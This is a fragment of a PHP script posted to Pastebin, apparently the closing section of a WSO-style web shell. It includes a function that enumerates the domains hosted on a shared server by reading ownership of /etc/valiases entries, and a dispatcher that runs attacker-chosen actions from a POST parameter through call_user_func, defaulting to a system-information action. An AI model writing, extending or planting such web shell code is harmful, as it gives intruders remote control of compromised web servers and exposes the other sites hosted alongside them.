  3149. {
  3150. foreach ($domains as $domain) {
  3151. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
  3152. $array= "http://$domain " . $user['name'] . "<br>";
  3153. $lol= '' . get_current_user();
  3154. if (strpos($array, "$lol") !== false) {
  3155. $shared = str_replace(array(" $lol"), "", $array);
  3156. echo "<center>$shared";
  3157. }
  3158. }
  3159. }
  3160.     printFooter();
  3161. }
  3162.  
  3163. if( empty($_POST['a']) )
  3164.     if(isset($default_action) && function_exists('action' . $default_action))
  3165.         $_POST['a'] = $default_action;
  3166.     else
  3167.         $_POST['a'] = 'SecInfo';
  3168. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  3169.     call_user_func('action' . $_POST['a'])
  3170. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top